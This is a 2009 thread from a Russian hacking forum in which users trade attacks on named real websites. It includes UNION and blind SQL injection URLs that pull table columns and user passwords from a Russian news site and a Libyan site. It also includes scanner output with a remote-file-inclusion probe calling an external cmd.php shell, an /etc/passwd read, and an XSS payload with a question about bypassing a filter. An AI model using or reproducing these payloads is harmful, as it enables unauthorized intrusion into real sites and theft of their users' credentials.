15.06.2009, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572
Юзай хекс, читай статьи. Тебе же линк дали! |
|
|
15.06.2009, 17:05
|
|
Новичок
Регистрация: 10.06.2009
Сообщений: 4
С нами:
8904867
Репутация:
0
|
|
Кто нибудь покажите где здесь уязвимость?
Найдено: /?PageServices
Найдено: /?wp-cs-dump
Найдено: /?wp-html-rend
Найдено: /?wp-stop-ver
Найдено: /?wp-uncheckout
Найдено: /?wp-usr-prop
Найдено: /?wp-ver-diff
Найдено: /?wp-verify-link
Найдено: /?wp-ver-info
Найдено: /index.php?IDAdmin=test
Найдено: /index.php?base=test
Найдено: /index.php?SqlQuery=test
Найдено: index.php?tampon=test
Найдено: /index.php?name=Members_List&letter=All&sortby=pass
Найдено: /index.php?name=Members_List&letter=All&sortby=uid
Найдено: /server-status/
Найдено: /index.php?name=Web_Links&ratinglid=96&ratinguser=? &ratinghost_name=?&rating=999999999999999999999 99
Найдено: index.php?module=calendar&calendar[view]=month&month=11&year=9
Найдено: /index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: index.php?a=lostpw&set=1&session_id=`
Найдено: /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: /index.php?a=lostpw&set=1&session_id=`
Найдено: /?page='
Найдено: /?page=shop/cart&func=cartAdd&product_id='
Найдено: /?page=shop/browse&category_id=&offset='
Найдено: /?page=admin/index&GulfTech=">
Найдено: /index.php?option=content&task=view&id='
i vot eshe
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
|
|
|
|
15.06.2009, 17:08
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
а полный линк не хошь выложить?
|
|
|
|
15.06.2009, 18:20
|
|
Новичок
Регистрация: 10.06.2009
Сообщений: 4
С нами:
8904867
Репутация:
0
|
|
Сообщение от Rubaka
а полный линк не хошь выложить?
Да пожайлуста
ka4ni.ру
Скажи и мне что там мона сделать особенно вот с этим
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
|
|
|
|
15.06.2009, 18:48
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 25
С нами:
9221480
Репутация:
55
|
|
ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'
|
|
|
|
15.06.2009, 19:23
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от molotovkeyt
ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'
Заурядная скуля
http://www.libyaonline.com/business/details.php?id=9846+and+1=if(ascii(substring((sele ct+user_password+from+users+limit+0,1),1,1))>1,1,0 )
Рядом есть с выводом
http://www.libyaonline.com/music/artist.php?id=-64+union+select+1,user_password,3,4,5,6+from+users +limit+0,1--+
Валемир, я думаю что нет
|
|
|
|
15.06.2009, 18:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
isher2003, Да ничего, просто двиг, при нахождении некоторых символов орет - хакинг аттемпт (т.е. попытка взлома).
Последний раз редактировалось mailbrush; 15.06.2009 в 18:58..
|
|
|
|
15.06.2009, 23:47
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
|
|
|
|
16.06.2009, 00:44
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от YuNi|[c
привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
Нет.
Сообщение от farpost
Кто чем ищет логи (конфиги итд....) апача при LFI?
http://forum.antichat.ru/thread49775.html
|
|
|
|
16.06.2009, 06:57
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от mailbrush
Нет.
http://forum.antichat.ru/thread49775.html
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
Вы еще скажите мне на запросе
Код:
1>"><ScRiPt%20%0a%0d>alert(401223179617)%3B</ScRiPt>
вместо номера 401223179617 фильтруется символы, как обходит этого? Чем зашифроват запрос?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
